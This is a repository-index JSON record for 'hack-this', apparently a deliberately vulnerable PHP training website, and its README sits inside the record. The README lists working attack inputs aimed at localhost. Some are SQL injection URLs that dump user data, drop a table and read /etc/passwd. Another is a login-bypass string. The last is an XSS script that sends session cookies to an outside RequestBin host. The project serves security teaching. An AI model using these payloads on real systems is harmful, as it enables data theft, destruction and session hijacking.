{"id":13797329,"url":"https://github.com/lambdacasserole/hack-this","last_synced_at":"2026-02-09T08:34:12.368Z","repository":{"id":75385887,"uuid":"76497882","full_name":"lambdacasserole/hack-this","owner":"lambdacasserole","description":"A collection of common web programming security mistakes.","archived":false,"fork":false,"pushed_at":"2019-06-11T16:25:38.000Z","size":342,"stargazers_count":15,"open_issues_count":0,"forks_count":4,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-02-24T13:47:12.573Z","etag":null,"topics":["education","hacking","php","security","sql-injection","vulnerabilities"],"latest_commit_sha":null,"homepage":"","language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lambdacasserole.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2016-12-14T21:18:47.000Z","updated_at":"2024-08-12T19:26:36.000Z","dependencies_parsed_at":"2023-06-06T09:00:36.256Z","dependency_job_id":null,"html_url":"https://github.com/lambdacasserole/hack-this","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/lambdacasserole/hack-this","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lambdacasserole%2Fhack-this","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lambdacasserole%2Fhack-this/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lambdacasserole%2Fhack-this/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lambdacasserole%2Fhack-this/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lambdacasserole","download_url":"https://codeload.github.com/lambdacasserole/hack-this/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lambdacasserole%2Fhack-this/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259298763,"owners_count":22836447,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["education","hacking","php","security","sql-injection","vulnerabilities"],"created_at":"2024-08-03T23:01:27.852Z","updated_at":"2026-02-09T08:34:07.318Z","avatar_url":"https://github.com/lambdacasserole.png","language":"HTML","funding_links":[],"categories":["\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":[],"readme":"# Hack This\nA collection of common web programming mistakes.\n\n![Screenshot](screenshot_small.png)\n\nThis website, when set up and configured, contains a number of vulnerabilities that can be exploited, including:\n\n* SQL Injection\n* XSS (Cross-Site Scripting)\n* Session Hijacking\n\n## Prerequisites\nYou'll need to have a web server installed and configured with PHP for this to work. I really recommend [XAMPP](https://www.apachefriends.org/), especially for Windows users. Once you've done that you can proceed.\n\nYou'll also need [Node.js](https://nodejs.org/en/) and [npm](https://www.npmjs.com/) installed and working.\n\n## Building\nClone the project down and open the folder in your favourite editor. It's a JetBrains PhpStorm project but you can use whichever paid/free software takes your fancy.\n\nFirst, install the npm packages necessary to build and run the website. Run the following in your terminal in the project root directory:\n\n```\nnpm install\n```\n\nThis will install [Bower](https://bower.io/) which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:\n\n```\nbower install\n```\n\nGulp will also have been installed. This will compile the [Less](http://lesscss.org/) and [CoffeeScript](http://coffeescript.org/) into CSS and JS ready for production. Do this using the command:\n\n```\ngulp\n```\n\nThis command will need running again every time you make a change to a Less file. If you're working on them, run `gulp watch` in a terminal to watch for file changes and compile accordingly.\n\n## Setup\nTo set everything up, you'll need to: \n\n* Import the file `db.sql` into your database\n* Modify the file `db_configuration.php` to correspond to your database\n* Access the site and get hacking\n\n## Examples\nExamples of vulnerabilities in this web application include:\n\n### SQL Injection\nIn an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application). \n\n* Get information for all users: \n    - `http://localhost/customers.php?username=leocadio'%20or%20'1'='1`\n    - `http://localhost/customers.php?username=leocadio'%20or%20''='`\n    - `http://localhost/customers.php?id=1%20or%201=1`\n* Drop (destroy) invoices table: \n    - `http://localhost/customers.php?id=1;drop%20table%20invoices`\n* Dump the password hash file from the server: \n    - Unix: `http://localhost/customers.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1`\n* Dump several things at once (oh boy): \n    - `http://localhost/customers.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world`\n\n### Bypass Login (SQL Injection)\nIt's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:\n\n```\nfoo' or '1'='1\n```\n\n### Session Hijacking (XSS)\nUsing a service like [RequestBin](https://requestbin.fullcontact.com/) it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with `{{ bin_id }}` substituted out for your RequestBin bin ID).\n\n```html\n\u003cscript\u003e\n    var xmlHttp = new XMLHttpRequest();\n    xmlHttp.open(\"GET\", \"http://requestbin.fullcontact.com/{{ bin_id }}?c=\" + document.cookie, false);\n    xmlHttp.send(null);\n\u003c/script\u003e\n```\n\n## Warnings\nThis site is intentionally left vulnerable to common exploits. Don't host it on the same server as any production sites, only ever deploy it on a machine that you wouldn't mind bricking (I recommend a disposable VM).\n\n## Acknowledgements\nThis is heavily based on the [php-sploits](https://github.com/jadz/php-sploits) repository by [Jared Mooring](https://github.com/jadz) and [Allan Shone](https://github.com/CerealBoy). Find the slides for their [SydPHP](https://github.com/sydphp) talk [here](http://www.slideshare.net/CerealBoy/sydphp-security).\n\nThe homepage template is a highly modified version of the [Blackrock Digital Freelancer](https://github.com/BlackrockDigital/startbootstrap-freelancer) template. Wonderful, free, MIT licensed template. Check it out if you're in the market for such a thing.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flambdacasserole%2Fhack-this","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flambdacasserole%2Fhack-this","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flambdacasserole%2Fhack-this/lists"}